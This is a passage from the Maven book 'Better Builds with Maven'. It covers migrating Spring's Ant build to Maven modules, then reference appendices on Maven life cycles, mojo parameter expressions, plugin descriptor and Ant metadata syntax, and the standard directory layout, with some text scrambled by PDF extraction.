4</version> <scope>test</scope> </dependency> The scope is set to test. as well. as all the test classes compile correctly now.mock. not tests.Migrating to Maven Setting the test sources for compilation follows the same procedure.springframework. as before. in order to compile the tests: <dependency> <groupId>javax. <testIncludes> <include>org/springframework/core/**</include> <include>org/springframework/util/**</include> </testIncludes> You may also want to check the Log4JConfigurerTests. Inside the mavencompiler-plugin configuration. To exclude test classes in Maven. org. As a result. Therefore. add the testExcludes element to the compiler configuration as follows. you will get compilation errors. In other words. if spring-core depends on spring-beans and spring-beans depends on spring-core. we cannot add a dependency from spring-core without creating a circular dependency. It may appear initially that spring-core depends on spring-mock.java</exclude> <exclude>org/springframework/util/SerializationTestUtils. you will see the following error: package javax. if you try to compile the test classes by running mvn test-compile.springframework.java</exclude> <exclude>org/springframework/util/ClassUtilsTests.servlet</groupId> <artifactId>servlet-api</artifactId> <version>2.beans packages are missing. but rather require other modules to be present. spring-web and spring-beans modules. you will need to add the testIncludes element.servlet does not exist This means that the following dependency must be added to the POM. which one do we build first? Impossible to know.java</exclude> <exclude>org/springframework/util/ReflectionUtilsTests. <testExcludes> <exclude>org/springframework/util/comparator/ComparatorTests.springframework.java</exclude> <exclude>org/springframework/util/ObjectUtilsTests. depend on classes from springcore.java</exclude> <exclude>org/springframework/core/io/ResourceTests. but this time there is a special case where the compiler complains because some of the classes from the org. when you run mvn test-compile. you will see that their main classes. it makes sense to exclude all the test classes that reference other modules from this one and include them elsewhere. Now. 255 . If you run mvn test-compile again you will have a successful build.java</exclude> </testExcludes> Now. So.web and org.java class for any hard codes links to properties files and change them accordingly. the key here is to understand that some of the test classes are not actually unit tests for springcore. as this is not needed for the main sources. but if you try to compile those other modules.
springframework. for the test class that is failing org.aopalliance package is inside the aopallience JAR.io. Failures: 1. However. as it will process all of the previous phases of the build life cycle (generate sources. The first section starts with java.core. Failures: 1.springframework.core. This indicates that there is something missing in the classpath that is required to run the tests.0</version> <scope>test</scope> </dependency> Now run mvn test again.015 sec <<<<<<<< FAILURE !! This output means that this test has logged a JUnit failure and error. so to resolve the problem add the following to your POM <dependency> <groupId>aopalliance</groupId> <artifactId>aopalliance</artifactId> <version>1.5.2. Within this file.Better Builds with Maven 8. Time elapsed: 0.FileNotFoundException: class path resource [org/aopalliance/] cannot be resolved to URL because it does not exist. you will find the following: [surefire] Running org.support. you will get the following error report: Results : [surefire] Tests run: 113. run tests. You will get the following wonderful report: [INFO] -----------------------------------------------------------------------[INFO] BUILD SUCCESSFUL [INFO] ------------------------------------------------------------------------ The last step in migrating this module (spring-core) from Ant to Maven. compile.PathMatchingResourcePatternResolverTe sts. This command can be used instead most of the time. [INFO] ------------------------------------------------------------------------ Upon closer examination of the report output. etc. is to run mvn install to make the resulting JAR available to other projects in your local Maven repository. there is a section for each failed test called stacktrace. simply requires running mvn test. when you run this command.txt. To debug the problem. Errors: 1. you will need to check the test logs under target/surefire-reports. compile tests.io.) 256 .support.PathMatchingResourcePatternResolverTests [surefire] Tests run: 5. The org. Errors: 1 [INFO] -----------------------------------------------------------------------[ERROR] BUILD ERROR [INFO] -----------------------------------------------------------------------[INFO] There are test failures.io. Running Tests Running the tests in Maven.
For instance.groupId}: groupId of the current POM being built For example. you can refer to spring-core from spring-beans with the following.version}: version of the current POM being built ${project.4</version> </dependency> </dependencyManagement> The following are some variables that may also be helpful to reduce duplication: • • ${project.6.6. In the same way. you will find that you are repeating yourself. 8. If you follow the order of the modules described at the beginning of the chapter you will be fine. and remove the versions from the individual modules (see Chapter 3 for more information). move these configuration settings to the parent POM instead.groupId}</groupId> <artifactId>spring-core</artifactId> <version>${project.version}</version> </dependency> 257 . instead of repeatedly adding the same dependency version information to each module. Using the parent POM to centralize this information makes it possible to upgrade a dependency version across all sub-projects from a single location. Avoiding Duplication As soon as you begin migrating the second module. That way. you will be adding the Surefire plugin configuration settings repeatedly for each module that you convert. To avoid duplication. See figure 8-1 to get the overall picture of the interdependencies between the Spring modules. otherwise you will find that the main classes from some of the modules reference classes from modules that have not yet been built. since they have the same groupId and version: <dependency> <groupId>${project. <dependencyManagement> <dependencies> <dependency> <groupId>commons-logging</groupId> <artifactId>commons-logging</artifactId> <version>1. Other Modules Now that you have one module working it is time to move on to the other modules. use the parent POM's dependencyManagement section to specify this information once.1.Migrating to Maven 8. each of the modules will be able to inherit the required Surefire configuration.0.
Generally with Maven. this can cause previously-described cyclic dependencies problem. First. they will need to run them under Java 5. By splitting them into different modules. Although it is typically not recommended. and spring-web-mock. Building Java 5 Classes Some of Spring's modules include Java 5 classes from the tiger folder.maven. you can use it as a dependency for other components. with only those classes related to spring-context module. how can the Java 1.6. by specifying the test-jar type. attempting to use one of the Java 5 classes under Java 1.6. you can split Spring's mock classes into spring-context-mock.5 sources be added? To do this with Maven. that a JAR that contains the test classes is also installed in the repository: <plugin> <groupId>org.version}</version> <type>test-jar</type> <scope>test</scope> </dependency> A final note on referring to test classes from other modules: if you have all of Spring's mock classes inside the same module. So. As the compiler plugin was earlier configured to compile with Java 1. you will need to create a new spring-beans-tiger module.groupId}</groupId> <artifactId>spring-beans</artifactId> <version>${project. To eliminate this problem. you need to create a new module with only Java 5 classes instead of adding them to the same module and mixing classes with different requirements. any users. be sure to put that JAR in the test scope as follows: <dependency> <groupId>${project. 8. users will know that if they depend on the module composed of Java 5 classes.Better Builds with Maven 8.4.2.plugins</groupId> <artifactId>maven-jar-plugin</artifactId> <executions> <execution> <goals> <goal>test-jar</goal> </goals> </execution> </executions> </plugin> Once that JAR is installed. 258 . Referring to Test Classes from Other Modules If you have tests from one component that refer to tests from other modules. particularly in light of transitive dependencies. in this case it is necessary to avoid refactoring the test source code.3 and some compiled for Java 5 in the same JAR. make sure that when you run mvn install. would experience runtime errors. it's easier to deal with small modules.apache. there is a procedure you can use.3 compatibility. However. with only those classes related to spring-web.3.3 or 1. Consider that if you include some classes compiled for Java 1.
the Java 5 modules will share a common configuration for the compiler. and then a directory for each one of the individual tiger modules.Migrating to Maven As with the other modules that have been covered. as follows: Figure 8-3: A tiger module directory The final directory structure should appear as follows: Figure 8-4: The final directory structure 259 . The best way to split them is to create a tiger folder with the Java 5 parent POM.>..apache. with all modules In the tiger POM.maven... you will need to add a module entry for each of the directories./tiger/src</sourceDirectory> <testSourceDirectory>./.5</target> </configuration> </plugin> </plugins> </build> 260 ././tiger/test</testSourceDirectory> <plugins> <plugin> <groupId>org.Better Builds with Maven Figure 8-5: Dependency relationship./.plugins</groupId> <artifactId>maven-compiler-plugin</artifactId> <configuration> <source>1./....5</source> <target>1.
Maven can call Ant tasks directly from a POM using the maven-antrun-plugin.springframework. you need to use the Ant task in the spring-remoting module to use the RMI compiler.classes.RmiInvocationWrapper" iiop="true"> <classpath refid="all-libs"/> </rmic> 261 .RmiInvocationWrapper"/> <rmic base="${target. In this case. but to still be able to build the other modules when using Java 1.remoting.5</jdk> </activation> <modules> <module>tiger</module> </modules> </profile> </profiles> 8. you just need a new module entry for the tiger folder. Using Ant Tasks From Inside Maven In certain migration cases. <profiles> <profile> <id>jdk1. with the Spring migration.classes. this is: <rmic base="${target.dir}" classname="org.4.6.5</id> <activation> <jdk>1. you may find that Maven does not have a plugin for a particular task or an Ant target is so small that it may not be worth creating a new plugin.Migrating to Maven In the parent POM.dir}" classname="org.rmi.remoting.rmi. From Ant.5 JDK.4 you will add that module in a profile that will be triggered only when using 1. For example.springframework.
add: <plugin> <groupId>org. stub and tie classes from them. To complete the configuration.home}/.jar</systemPath> </dependency> </dependencies> </plugin> As shown in the code snippet above. and required by the RMI task.compile.directory} and maven.directory}/classes" classname="org.remoting.build.Better Builds with Maven To include this in Maven build.classpath"/> </rmic> </tasks> </configuration> <goals> <goal>run</goal> </goals> </execution> </executions> <dependencies> <dependency> <groupId>com. So.sun</groupId> <artifactId>tools</artifactId> <scope>system</scope> <version>1.RmiInvocationWrapper" iiop="true"> <classpath refid="maven.4</version> <systemPath>${java..apache.RmiInvocationWrapper"/> <rmic base="${project.build. In this case./lib/tools. the most appropriate phase in which to run this Ant task is in the processclasses phase.springframework.rmi.build. will take the compiled classes and generate the rmi skeleton. which applies to that plugin only.plugins</groupId> <artifactId>maven-antrun-plugin</artifactId> <executions> <execution> <phase>process-classes</phase> <configuration> <tasks> <echo>Running rmic</echo> <rmic base="${project.compile.directory}/classes" classname="org. 262 . you will need to determine when Maven should run the Ant task.maven.jar above. such as ${project.remoting. there are some references available already. the rmic task. such as the reference to the tools.rmi.classpath. There are also references for anything that was added to the plugin's dependencies section. which is a classpath reference constructed from all of the dependencies in the compile scope or lower. which is bundled with the JDK.springframework.
6. such as springaspects.html.apache. Sun's Activation Framework and JavaMail are not redistributable from the repository due to constraints in their licenses. These issues were shared with the Spring developer community and are listed below: • Moving one test class. There is some additional configuration required for some modules. You can then install them in your local repository with the following command. 8. which uses AspectJ for weaving the classes. NamespaceHandlerUtilsTests. special cases that must be handled. You may need to download them yourself from the Sun site or get them from the lib directory in the example code for this chapter.3.6.Migrating to Maven 8. For more information on dealing with this issue.2 -Dpackaging=jar You will only need to do this process once for all of your projects or you may use a corporate repository to share them across your organization. as these test cases will not work in both Maven and Ant. Some Special Cases In addition to the procedures outlined previously for migrating Spring to Maven.jar -DgroupId=javax.mail -DartifactId=mail -Dversion=1. to install JavaMail: mvn install:install-file -Dfile=mail. there are two additional. which used relative paths in Log4JConfigurerTests class. For example.5. 263 . see.. Using classpath resources is recommended over using file system resources. These can be viewed in the example code. mvn install:install-file -Dfile=<path-to-file> -DgroupId=<group-id> -DartifactId=<artifact-id> -Dversion=<version> -Dpackaging=<packaging> For instance.6. Non-redistributable Jars You will find that some of the modules in the Spring build depend on JARs that are not available in the Maven central repository.
these would move from the original test folder to src/test/java and src/test/resources respectively for Java sources and other files .you can delete that 80 MB lib folder. Finally. you would move all Java files under org/springframework/core and org/springframework/util from the original src folder to the module's folder src/main/java. you would eliminate the need to include and exclude sources and resources “by hand” in the POM files as shown in this chapter. The same for tests. you can realize Maven' other benefits . as Maven downloads everything it needs and shares it across all your Maven projects automatically . reports. and quality metrics. In the case of the Spring example. Restructuring the Code If you do decide to use Maven for your project. create JARs. By adopting Maven's standard directory structure. compile and test the code. Summary By following and completing this chapter. ObjectUtilsTests. Once you decide to switch completely to Maven. At the same time.Better Builds with Maven 8. 264 . you will be able to keep your current build working. reducing its size by two-thirds! 8. you will be able to take an existing Ant-based build. and install those JARs in your local repository using Maven. Maven can eliminate the requirement of storing jars in a source code management system. for the spring-core module.just remember not to move the excluded tests (ComparatorTests. SerializationTestUtils and ResourceTests). By doing this. ClassUtilsTests. For example.advantages such as built-in project documentation generation. in addition to the improvements to your build life cycle.7. Now that you have seen how to do this for Spring. ReflectionUtilsTests. you can apply similar concepts to your own Ant based build. you will be able to take advantage of the benefits of adopting Maven's standard directory structure.8. split it into modular components (if needed). Once you have spent this initial setup time Maven. you can simplify the POM significantly. All of the other files under those two packages would go to src/main/resources. it it highly recommended that you go through the restructuring process to take advantage of the many timesaving and simplifying conventions within Maven.
I'll try not to take that personally. All systems automated and ready. Scott. A chimpanzee and two trainees could run her! Kirk: Thank you.Appendix A: Resources for Plugin Developers Appendix A: Resources for Plugin Developers In this appendix you will find: • Maven's Life Cycles • Mojo Parameter Expressions • Plugin Metadata Scotty: She's all yours. Mr. .Star Trek 265 . sir.
initialize – perform any initialization steps required before the main part of the build can start.1.Better Builds with Maven A. For example. This is necessary to accommodate the inevitable variability of requirements for building different types of projects. and the content of the current set of POMs to be built is valid. generate-test-sources – generate compilable unit test code from other source formats. A. In other words. process-classes – perform any post-processing of the binaries produced in the preceding step. It continues by describing the mojos bound to the default life cycle for both the jar and maven-plugin packagings. as when using Aspect-Oriented Programming techniques. archiving it into a jar. performing any associated tests. corresponding to the three major activities performed by Maven: building a project from source. along with a short description for the mojos which should be bound to each. etc. 8. along with a summary of bindings for the jar and maven-plugin packagings. For the default life cycle. 4. This may include copying these resources into the target classpath directory in a Java build. It begins by listing the phases in each life cycle. 6. compile – compile source code into binary form. 3. Life-cycle phases The default life cycle is executed in order to perform a traditional build. generate-resources – generate non-code resources (such as configuration files. process-resources – perform any modification of non-code resources necessary.) from other source formats. in the target output location. validate – verify that the configuration of Maven. mojo-binding defaults are specified in a packaging-specific manner. 2. this section will describe the mojos bound by default to the clean and site life cycles. It contains the following phases: 1. The default Life Cycle Maven provides three life cycles. generate-sources – generate compilable code from other source formats. This section contains a listing of the phases in the default life cycle. and generating a project web site. 7. 9. cleaning a project of the files generated by a build. a mojo may apply source code patches here.1. Maven's Life Cycles Below is a discussion of Maven's three life cycles and their default mappings. such as instrumentation or offline code-weaving. Finally. and distributing it into the Maven repository system. 266 . it takes care of compiling the project's code. 5. process-sources – perform any source modification processes necessary to prepare the code for compilation.1.
16. process-test-resources – perform any modification of non-code testing resources necessary. a mojo may apply source code patches here. generate-test-resources – generate non-code testing resources (such as configuration files. install – install the distributable archive into the local Maven repository. 17. deploy – deploy the distributable archive into the remote Maven repository configured in the distributionManagement section of the POM. 11. before it is available for installation or deployment.Appendix A: Resources for Plugin Developers 10. preintegration-test – setup the integration testing environment for this project. test – execute unit tests on the application compiled and assembled up to step 8 above. test-compile – compile unit test source code into binary form. etc.) from other source formats. in the testing target output location. 14. package – assemble the tested application code and resources into a distributable archive. 18. 15. 21. This may include copying these resources into the testing target classpath location in a Java build. verify – verify the contents of the distributable archive. 12. post-integration-test – return the environment to its baseline form after executing the integration tests in the preceding step. For example. 13. 267 . using the environment configured in the preceding step. 19. 20. integration-test – execute any integration tests defined for this project. process-test-sources – perform any source modification processes necessary to prepare the unit test code for compilation. This could involve removing the archive produced in step 15 from the application server used to test it. This may involve installing the archive from the preceding step into some sort of application server.
Alongside each. Compile unit-test source code to the test output directory. Copy non-source-code test resources to the test output directory for unit-test compilation.testRes maven-resourcesresources ources plugin test-compile test package install deploy testCom maven-compilerpile plugin test jar maven-surefireplugin maven-jar-plugin install maven-installplugin deploy maven-deployplugin 268 . Execute project unit tests. you will find a short description of what that mojo does.. Create a jar archive from the staging directory. Deploy the jar archive to a remote Maven repository. Filter variables if necessary. process-test. Install the jar archive into the local Maven repository.Better Builds with Maven Bindings for the jar packaging Below are the default life-cycle bindings for the jar packaging. Compile project source code to the staging directory for jar creation.
and the rest. Indeed. compiling source code. As such. if one exists. packaging. testing. and metadata references to latest plugin version. 269 . maven-plugin-plugin Update the plugin registry. to install updateRegistry reflect the new plugin installed in the local repository. for example). maven-plugin artifacts are in fact jar files. the maven-plugin packaging also introduces a few new mojo bindings.. they undergo the same basic processes of marshaling non-source-code resources. and generate a plugin descriptor.Appendix A: Resources for Plugin Developers Bindings for the maven-plugin packaging The maven-plugin project packaging behaves in almost the same way as the more common jar packaging. However. to extract and format the metadata for the mojos within. addPluginArtifact Metadata maven-plugin-plugin Integrate current plugin information with package plugin search metadata.
2. 270 . post-clean – finalize the cleaning process. along with a summary of the default bindings. which perform the most common tasks involved in cleaning a project. along with any additional directories configured in the POM. Maven provides a set of default mojo bindings for this life cycle. Life-cycle phases The clean life-cycle phase contains the following phases: 1. you will find a short description of what that mojo does. effective for all POM packagings. clean – remove all files that were generated during another build process 3. the state of the project before it was built.Better Builds with Maven A. Table A-3: The clean life-cycle bindings for the jar packaging Phase Mojo Plugin Description clean clean maven-clean-plugin Remove the project build directory.1. Below is a listing of the phases in the clean life cycle. pre-clean – execute any setup or initialization procedures to prepare the project for cleaning 2. Default life-cycle bindings Below are the clean life-cycle bindings for the jar packaging. Alongside each. The clean Life Cycle This life cycle is executed in order to restore a project back to some baseline state – usually.
and even deploy the resulting web site to your server. render your documentation source files into HTML. Table A-4: The site life-cycle bindings for the jar packaging Phase Mojo Plugin Description site site maven-site-plugin maven-site-plugin Generate all configured project reports. along with a summary of the default bindings. you will find a short description of what that mojo does.Appendix A: Resources for Plugin Developers A. site-deploy – use the distributionManagement configuration in the project's POM to deploy the generated web site files to the web server. which perform the most common tasks involved in generating the web site for a project. Below is a listing of the phases in the site life cycle.3. Maven provides a set of default mojo bindings for this life cycle. and prepare the generated web site for potential deployment 4. The site Life Cycle This life cycle is executed in order to generate a web site for your project. and render documentation into HTML 3. Life-cycle phases The site life cycle contains the following phases: 1.1. Alongside each. site-deploy deploy 271 . site – run all associated project reports. It will run any reports that are associated with your project. and render documentation source files into HTML. Deploy the generated web site to the web server path specified in the POM distribution Management section. pre-site – execute any setup or initialization steps to prepare the project for site generation 2. effective for all POM packagings. post-site – execute any actions required to finalize the site generation process. Default Life Cycle Bindings Below are the site life-cycle bindings for the jar packaging.
apache.apache.re This is a reference to the local repository pository.util.ma List of reports to be generated when the site ven.maven. and extract only the information it requires. java. Using the discussion below.Better Builds with Maven A.apache.ma List of project instances which will be ven. It is used for bridging results from forked life cycles back to the main line of execution.MavenProject> processed as part of the current build.1. Simple Expressions Maven's plugin parameter injector supports several primitive expressions. Finally.List<org. It will summarize the root objects of the build state which are available for mojo expressions.2.ArtifactRepository used to cache artifacts during a Maven build. ${reactorProjects} ${reports} ${executedProject} java. They are summarized below: Table A-5: Primitive expressions supported by Maven's plugin parameter Expression Type Description ${localRepository} ${session} org. These expressions allow a mojo to traverse complex build state.2.apache. in addition to providing a mechanism for looking up Maven components on-demand.List<org.maven. org.maven. 272 . along with the published Maven API documentation.project.execution.project. which act as a shorthand for referencing commonly used build state objects.M The current build session. Mojo Parameter Expressions Mojo parameter values are resolved by way of parameter expressions when a mojo is initialized.apache. org. it will describe the algorithm used to resolve complex parameter expressions.MavenReport> life cycle executes. A. and often eliminates dependencies on Maven itself beyond the plugin API.artifact. This reduces the complexity of the code contained in the mojo. This contains avenSession methods for accessing information about how Maven was called.util.reporting. mojo developers should have everything they need to extract the build state they require.Mav This is a cloned instance of the project enProject instance currently being built. This section discusses the expression language used by Maven to inject build state and plugin configuration into mojos.
The first is the root object. Complex Expression Roots In addition to the simple expressions above. 273 .File The current project's root directory.2.project.maven. This root object is retrieved from the running application using a hard-wired mapping. If at some point the referenced object doesn't contain a property that matches the next expression part. Otherwise.apache. The resulting value then becomes the new 'root' object for the next round of traversal. unless specified otherwise.m2/settings. org. merged from ings conf/settings. the value that was resolved last will be returned as the expression's value.xml in the maven application directory and from . A.maven. ${plugin} org. much like a primitive expression would. ptor.Sett The Maven settings. an expression part named 'child' translates into a call to the getChild() method on that object. From there. this reflective lookup process is aborted. The valid root objects for plugin parameter expressions are summarized below: Table A-6: A summary of the valid root objects for plugin parameter expressions Expression Root Type Description ${basedir} ${project} ${settings} java. and must correspond to one of the roots mentioned above. the expression is split at each '.PluginDescriptor including its dependency artifacts. successive expression parts will extract values from deeper and deeper inside the build state.apache. following standard JavaBeans naming conventions. the next expression part is used as a basis for reflectively traversing that object' state. During this process.' character. When there are no more expression parts. No advanced navigation can take place using is such expressions. rendering an array of navigational directions. Project org.io.Maven Project instance which is currently being built.3.apache. The Expression Resolution Algorithm Plugin parameter expressions are resolved using a straightforward algorithm.plugin. if the expression matches one of the primitive expressions (mentioned above) exactly. First. then the value mapped to that expression is returned.xml in the user's home directory.Appendix A: Resources for Plugin Developers A.descri The descriptor instance for the current plugin.2. Maven supports more complex expressions that traverse the object graph starting at some root object that contains build state. if there is one.maven. Repeating this.2.settings.
resolved in this order: 1.plugins</groupId> <artifactId>maven-myplugin-plugin</artifactId> <version>2.The description element of the plugin's POM. an ancestor POM. as well as the metadata formats which are translated into plugin descriptors from Java. Its syntax has been annotated to provide descriptions of the elements.and Ant-specific mojo source files. then the string literal of the expression itself is used as the resolved value. If the parameter is still empty after these two lookups. If a user has specified a property mapping this expression to a specific value in the current POM. It includes summaries of the essential plugin descriptor.This element provides the shorthand reference for this plugin. This includes properties specified on the command line using the -D commandline option. |-> <goalPrefix>myplugin</goalPrefix> <!-.apache. For | instance. or method invocations that don't conform to standard JavaBean naming conventions. Currently. <plugin> <!-.maven.The name of the mojo. If the value is still empty. | this name allows the user to invoke this mojo from the command line | using 'myplugin:do-something'. Plugin descriptor syntax The following is a sample plugin descriptor. --> <description>Sample Maven Plugin</description> <!-. Combined with the 'goalPrefix' element above.This is a list of the mojos contained within this plugin. |-> <inheritedByDefault>true</inheritedByDefault> <!-. 2. Maven plugin parameter expressions do not support collection lookups.Whether the configuration for this mojo should be inherted from | parent to child POMs by default. or an active profile. array index references. it will be resolved as the parameter value at this point. --> <mojos> <mojo> <!-. this plugin could be referred to from the command line using | the 'myplugin:' prefix.0-SNAPSHOT</version> <!-. The POM properties.Better Builds with Maven If at this point Maven still has not been able to resolve a value for the parameter expression. Plugin metadata Below is a review of the mechanisms used to specify metadata for plugins. Maven will consult the current system properties. it will attempt to find a value in one of two remaining places.These are the identity elements (groupId/artifactId/version) | from the plugin POM. The system properties. |-> <groupId>org. |-> <goal>do-something</goal> 274 .
| This allows the user to specify that this mojo be executed (via the | <execution> section of the plugin configuration in the POM).Ensure that this other mojo within the same plugin executes before | this one.Determines how Maven will execute this mojo in the context of a | multimodule build. |-> <phase>compile</phase> <!-. then execute that life cycle up to the specified phase. |-> <requiresDirectInvocation>false</requiresDirectInvocation> <!-. but the mojo itself has certain life-cycle | prerequisites. such mojos will | cause the build to fail. it will only | execute once. --> <description>Do something cool.Tells Maven that a valid project instance must be present for this | mojo to execute. it will be executed once for each project instance in the | current build.Tells Maven that this mojo can ONLY be invoked directly.Tells Maven that a valid list of reports for the current project are | required before this plugin can execute. It's restricted to this plugin to avoid creating inter-plugin | dependencies.Some mojos cannot execute if they don't have access to a network | connection. |-> <executeLifecycle>myLifecycle</executeLifecycle> <!-. Mojos that are marked as aggregators should use the | ${reactorProjects} expression to retrieve a list of the project | instances in the current build. If Maven is operating in offline mode. without | also having to specify which phase is appropriate for the mojo's | execution.Which phase of the life cycle this mojo will bind to by default. If the mojo is not marked as an | aggregator.Appendix A: Resources for Plugin Developers <!-.This tells Maven to create a clone of the current project and | life cycle. This is | useful to inject specialized behavior in cases where the main life | cycle should remain unchanged. via the | command line. It is a good idea to provide this. | and specifies a custom life-cycle overlay that should be added to the | cloned life cycle before the specified phase is executed.</description> <!-. regardless of the number of project instances in the | current build. to give users a hint | at where this task should run. If a mojo is marked as an aggregator. | This is useful when the user will be invoking this mojo directly from | the command line. This flag controls whether the mojo requires 275 . |-> <requiresProject>true</requiresProject> <!-. |-> <executePhase>process-resources</executePhase> <!-. |-> <requiresReports>false</requiresReports> <!-.Description of what this mojo does. |-> <executeGoal>do-something-first</executeGoal> <!-.This is optionally used in conjunction with the executePhase element. |-> <aggregator>false</aggregator> <!-.
--> <parameters> <parameter> <!-.plugins. this parameter must be configured via some other section of | the POM.maven.SiteDeployMojo</implementation> <!-.The parameter's name. either via command-line or POM configuration.Tells Maven that the this plugin's configuration should be inherted | from a parent POM by default. |-> <inheritedByDefault>true</inheritedByDefault> <!-. |-> <requiresOnline>false</requiresOnline> <!-.The Java type for this parameter. |-> <alias>outputDirectory</alias> <!-.apache. |-> <implementation>org.site. the | mojo (and the build) will fail when this parameter doesn't have a | value. In Java mojos. --> <language>java</language> <!-.</description> </parameter> </parameters> 276 .Better Builds with Maven | Maven to be online. | It will be used as a backup for retrieving the parameter value. this will often reflect the | parameter field name in the mojo class.Description for this parameter.This is a list of the parameters used by this mojo.This is an optional alternate parameter name for this parameter. If set to | false.Whether this parameter is required to have a value. |-> <editable>true</editable> <!-. |-> <name>inputDirectory</name> <!-. specified in the javadoc comment | for the parameter field in Java mojo implementations.Whether this parameter's value can be directly specified by the | user.The class or script path (within the plugin's jar) for this mojo's | implementation. as in the case of the list of project dependencies. |-> <description>This parameter does something important.File</type> <!-. --> <type>java. If true. |-> <required>true</required> <!-.io. unless the user specifies | <inherit>false</inherit>.The implementation language for this mojo.
WagonManager</role> <!-.manager. as | compared to the descriptive specification above.This is the list of non-parameter component references used by this | mojo. |-> <field-name>wagonManager</field-name> </requirement> </requirements> </mojo> </mojos> </plugin> 277 . The expression used to extract the | parameter value is ${project.File">${project. | | The general form is: | <param-nameparam-expr</param-name> | |-> <configuration> <!-.apache. |-> <requirements> <requirement> <!-. this parameter is named "inputDirectory".WagonManager |-> <role>org.Use a component of type: org.artifact. |-> <inputDirectory implementation="java.For example. Each parameter must | have an entry here that describes the parameter name.File.This is the operational specification of this mojo's parameters.reporting. | along with an optional classifier for the specific component instance | to be used (role-hint).artifact.outputDirectory}</inputDirectory> </configuration> <!-. Finally.Appendix A: Resources for Plugin Developers <!-.apache.outputDirectory}.Inject the component instance into the "wagonManager" field of | this mojo.io.io. Components are specified by their interface class name (role). | and the primary expression used to extract the parameter's value. and it | expects a type of java.maven. the requirement specification tells | Maven which mojo-field should receive the component instance.reporting. parameter type.manager.maven.
Alphanumeric. executeLifecycle. life cycle name. with dash ('-') Any valid phase name true or false (default is false) true or false (default is true) true or false (default is false) true or false (default is false) Yes No No No No No 278 . Class-level annotations The table below summarizes the class-level javadoc annotations which translate into specific elements of the mojo section in the plugin descriptor. Classlevel annotations correspond to mojo-level metadata elements.2. Java Mojo Metadata: Supported Javadoc Annotations The Javadoc annotations used to supply metadata about a particular mojo come in two types. and field-level annotations correspond to parameter-level metadata elements.4. Table A-7: A summary of class-level javadoc annotations Descriptor Element Javadoc Annotation Values Required? aggregator description executePhase..
and requirements sections of a mojo's specification in the plugin descriptor. These metadata translate into elements within the parameter.The dependency scope required for this mojo. corresponding to the ability to map | multiple mojos into a single build script.The default life-cycle phase binding for this mojo --> <phase>compile</phase> <!-. NOTE: | multiple mojos are allowed here.Whether this mojo requires a current project instance --> <requiresProject>true</requiresProject> <!-. configuration. Ant Metadata Syntax The following is a sample Ant-based mojo metadata file. <pluginMetadata> <!-. Its syntax has been annotated to provide descriptions of the elements. |-> <requiresDependencyResolution>compile</requiresDependencyResolution> <!-.The name for this mojo --> <goal>myGoal</goal> <!-. |-> <mojos> <mojo> <!-.Whether this mojo requires access to project reports --> <requiresReports>true</requiresReports> 279 . Maven will resolve | the dependencies in this scope before this mojo executes.Appendix A: Resources for Plugin Developers Field-level annotations The table below summarizes the field-level annotations which supply metadata about mojo parameters.. Table A-8: Field-level annotations Descriptor Element Javadoc Annotation Values Required? alias.Contains the list of mojos described by this metadata file.5.2.
|-> <property>prop</property> <!-.The list of parameters this mojo uses --> <parameters> <parameter> <!-.maven.Another mojo within this plugin to execute before this mojo | executes. |-> <inheritByDefault>true</inheritByDefault> <!-.apache.This is the type for the component to be injected. --> <name>nom</name> <!-.A named overlay to augment the cloned life cycle for this fork | only |-> <lifecycle>mine</lifecycle> <!-.artifact.The parameter name.The property name used by Ant tasks to reference this parameter | value.The phase of the forked life cycle to execute --> <phase>initialize</phase> <!-.Whether this mojo requires Maven to execute in online mode --> <requiresOnline>true</requiresOnline> <!-.Whether the configuration for this mojo should be inherited | from parent to child POMs by default.This describes the mechanism for forking a new life cycle to be | executed prior to this mojo executing.Whether this parameter is required for mojo execution --> <required>true</required> 280 .Whether this mojo operates as an aggregator --> <aggregator>true</aggregator> <!-. |-> <execute> <!-. |-> <goal>goal</goal> </execute> <!-.This is an optional classifier for which instance of a particular | component type should be used.List of non-parameter application components used in this mojo --> <components> <component> <!-.ArtifactResolver</role> <!-. |-> <requiresDirectInvocation>true</requiresDirectInvocation> <!-. --> <role>org.Whether this mojo must be invoked directly from the command | line.resolver.Better Builds with Maven <!-. |-> <hint>custom</hint> </component> </components> <!-.
If this is specified.The description of what the mojo is meant to accomplish --> <description> This is a test. this element will provide advice for an | alternative parameter to use instead.Appendix A: Resources for Plugin Developers <!-.Whether the user can edit this parameter directly in the POM | configuration or the command line |-> <readonly>true</readonly> <!-. </description> <!-. |-> <deprecated>Use another mojo</deprecated> </mojo> </mojos> </pluginMetadata> 281 .maven.When this is specified.apache.MavenProject</type> <!-. it provides advice on which alternative mojo | to use.The description of this parameter --> <description>Test parameter</description> <!-.An alternative configuration name for this parameter --> <alias>otherProp</alias> <!-.artifactId}</defaultValue> <!-. |-> <deprecated>Use something else</deprecated> </parameter> </parameters> <!-.property}</expression> <!-.The expression used to extract this parameter's value --> <expression>${my.The Java type of this mojo parameter --> <type>org.project.The default value provided when the expression won't resolve --> <defaultValue>${project. .
txt README. Standard location for test sources.txt target/ Maven’s POM. 284 . Standard location for application resources. Directory for all generated output. the generated site or anything else that might be generated as part of your build. which is always at the top-level of a project. Standard location for assembly filters. Standard location for application configuration filters. This would include compiled classes. Standard location for resource filters. Standard Directory Structure Table B-1: Standard directory layout for maven project content Standard Location Description pom. A license file is encouraged for easy identification by users and is optional.Better Builds with Maven B. Standard location for test resources. For example.xml LICENSE.1. Standard location for test resource filters. A simple note which might help first time users and is optional. generated sources that may be compiled. you src/main/java/ src/main/resources/ src/main/filters/ src/main/assembly/ src/main/config/ src/test/java/ src/test/resources/ src/test/filters/ Standard location for application sources. may generate some sources from a JavaCC grammar. target/generated-sources/<plugin-id> Standard location for generated sources.
Maven’s Super POM <project> <modelVersion>4.2.org/maven2</url> <layout>default</layout> <snapshots> <enabled>false</enabled> </snapshots> <releases> <updatePolicy>never</updatePolicy> </releases> </pluginRepository> </pluginRepositories> <!-..org/maven2</url> <snapshots> <enabled>false</enabled> </snapshots> </repository> </repositories> <!-.Appendix B: Standard Conventions B..maven.Reporting Conventions --> <reporting> <outputDirectory>target/site</outputDirectory> </reporting> . </project> 285 .0</modelVersion> <name>Maven Default Project</name> <!-.Plugin Repository Conventions --> <pluginRepositories> <pluginRepository> <id>central</id> <name>Maven Plugin Repository</name> <url>> <!-.Repository Conventions --> <repositories> <repository> <id>central</id> <name>Maven Repository Switchboard</name> <layout>default</layout> <url>.
